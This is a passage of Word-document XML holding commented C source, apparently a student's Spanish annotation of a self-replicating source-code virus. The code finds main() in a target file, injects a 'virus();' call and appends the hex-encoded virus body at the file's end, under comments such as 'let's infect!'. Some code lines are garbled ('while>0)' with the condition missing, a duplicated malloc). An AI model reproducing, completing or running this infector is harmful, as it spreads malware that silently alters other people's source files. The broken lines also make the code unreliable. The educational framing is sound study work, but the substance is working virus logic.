    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //de caso contrario no se encontro  por lo que vale un numero negativo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                  posmain = -1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//al valer -1 sale del if que contiene un else y entra en este else de afuera del if almacenando un -1 a posmain </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else posmain = -1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//en caso de que posmain tenga bytes entrara en este condicional</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">             if(posmain&gt;0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                /* let's infect! */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //posiciona el puntero al pincipio del fichero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                lseek(fd, 0, SEEK_SET);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //en la variable de tipo entero se almacenara el numero de caracteres de la cadena apuntada dividido 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                writebyte = strlen(charinclude) / 2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //se almacena en readbuffer  la cantidad de memoria para asignar a bytes y se hace un castin para pasarlo a char</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                readbuffer = (char *)malloc(writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //se almacena en writebuffer  la cantidad de memoria para asignar a bytes y se hace un castin para pasarlo a char</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                writebuffer = (char *)malloc(writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                writebuffer = (char *)malloc(writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //este for arranca de 0 y va hasta el ultima cadena de caracteres que hay en el array chardinclude y va de dos en dos en numeros pares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                for(i=0;i&lt;strlen(charinclude);i+=2) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{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//en el array nible en la primer posicion que es 0 almacenamos el los caracteres del array chardinclude</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                  nibble[0] = charinclude[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                  //en el segundo se almacenan los caracteres impares ya que en el primero arranca de 0 y va de dos en dos pero en este arranca en 1 y va de 2 en 2 por lo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                  //cual va 1,3,5,7,etc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                  nibble[1] = charinclude[i+1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                  //toma los datos del propio programa es decir del propio fichero al que accedemos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                  sscanf(nibble, "%02X", &amp;nibblechar);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                  //concatena el primer caracter de nibblechar a writerbuffer y devuelve valor de wiretebuffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                  strncat(writebuffer, &amp;nibblechar, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               //si es mayor a 0 entra en el siclo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">              while&gt;0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//la funcion lseek recibe tres parametros el primero es el descriptor del fichero, el segundo es el desplazamiento en el que queremos posicionarnos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> //y el tercero lleva varias contantes y la que se utiliza es SEEK_CUR que se posiciona el puntero a el desplazamiento en que queremos posicionarnos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> //que en este caso es la posicion actual del puntero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> lseek(fd, -readbyte, SEEK_CUR);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> //escribe en la posicion actual del fichero que este abierto el primer parametro es el descriptor del fichero en donde se encuentra el fichero abierto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> //el segundo el puntero al buffer de la memoria donde se efectua la transferencia y el tercero el tamaño de bytes del buffer que qeuremos en este caso escribir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 write(fd, writebuffer, writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //en la variable witebyte se almacena en bytes lo que se lea del fichero abierto   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 writebyte = read(fd, writebuffer, writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //nos posicionamos en el fichero abierto en la posicion actual donde se encuentre el puntero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 lseek(fd, -writebyte, SEEK_CUR);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //escribe en el fichero  el tamaño asignado que se almacena en readbyte, y el apuntador al bufer donde se realizara la tranferencia e sreadbuffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 write(fd, readbuffer, readbyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">               }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               //nos posiciona en el fichero abierto  en la posicion actual donde se encuentra el puntero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               lseek(fd,-readbyte,SEEK_CUR);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               //escribe en el fichero abierto los bites que se encuentran writebytes </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               write(fd,writebuffer,writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               /* call virus from main() se llama al virus desde el main */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               //se almacena en la variable writebyte los caracteres de el array chardinclude dividio entre dos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               writebyte = strlen(charinclude) / 2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               //nos posicionamos en ese fichero abierto  en la posicion de la suma de bytes de posmain mas writebyte  arrancando del principio del fichero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               lseek(fd, posmain+writebyte, SEEK_SET);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               writebyte = strlen("\n  virus();\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               //se almacena en readmain la cantidad de memoria para asignar a bytes y hacemos casting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               readmain = (char *)malloc(writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               writemain = (char *)malloc(writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               //copia en la variable de destino writemain la cadena de caracteres  "virus()"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               strcpy(writemain,"\n  virus();\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               //si es mayor a 0 entra en el bucle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               while&gt;0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    //nos posicinamos en el fichero abierto en la posicion de los bytes que tenga radbytes arancando de  de la posicion actual donde se encuentra el puntero hacia atras </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 lseek(fd,-readbyte,SEEK_CUR);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //escribimos en el fichero abierto los caracteres almacenados en witebyte, y un puntero a un buffer de memoria (writemain)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 write(fd,writemain,writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //se almacena en writebyte lo cantidad de bytes que espisificamos con writebyte a leer </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                 writebyte=read(fd,writemain,writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 // nos pisicionamos en el fichero la cantidad de bytes que se encuntran en la variable writebyte arrancando de la posicion actual donde se encuentra el ficher hacia atras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 lseek(fd,-writebyte,SEEK_CUR);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 write(fd,readmain,readbyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               //sale del bule y se posiciona  en donde se encuentre el puntero actual menos la cantidad de bytes que tien readbyte</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                lseek(fd,-readbyte,SEEK_CUR);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //ahora escribimos en el fichero los caracteres almacenados en writebyte en el puntero writemain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                write(fd,writemain,writebyte);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                /* copy virus function at EOF */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                lseek(fd, 0, SEEK_END);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //ciclo for que va de 0 hasta la cantidad de caracteres de charvirus y va de dos en dos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               for(i=0;i&lt;strlen(charvirus);i+=2) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//en la primer posicion del array se almacena los caracteres pares del array charvirus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 nibble[0] = charvirus[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //se almacenan los caracteres impares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 nibble[1] = charvirus[i+1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //toma los datos del ropio programa es decir del propio fichero que accedemos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 sscanf(nibble,"%02X",&amp;nibblechar);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //y escribimos en ese fichero un bite de informacion de el array nibblechar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 write(fd, &amp;nibblechar, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //escribe en el fichero </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                write(fd, "\n  char charinclude[] = \"", strlen("\n  char charinclude[] = \""));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //escribimos en el fichero que se encuentra interactuando la cantidad de caracteres de charinclude, en donde se esta apuntando a la memoria para realizar la tranferencia de bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                write(fd, charinclude, strlen(charinclude));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                write(fd, "\";\n  char charvirus[] = \"", strlen("\";\n  char charvirus[] = \""));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                write(fd, charvirus, strlen(charvirus));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                write(fd, "\";\n  char charvirusend[] = \"", strlen("\";\n  char charvirusend[] = \""));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                write(fd, charvirusend, strlen(charvirusend));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                write(fd, "\";\n", strlen("\";\n"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //posicionamos al final del fichero </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                lseek(fd, 0, SEEK_END);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                //ciclo for que va de 0 ha la cantidad de caracteres que tenga chrvirusend y va de dos en dos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                for(i=0;i&lt;strlen(charvirusend);i+=2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//se almacena en la primera posicion del array los bytes que se encuentran en las posiciones pares </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 nibble[0] = charvirusend[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //se almacenan los impares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 nibble[1] = charvirusend[i+1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //toma los datos del ropio programa es decir del propio fichero que accedemos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 sscanf(nibble,"%02X",&amp;nibblechar);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //escribimos en el fichero la cantidad de un byte de informacion en la memoria que aunta nibblechar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 write(fd, &amp;nibblechar, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                /* that's all folks! */</w:t>
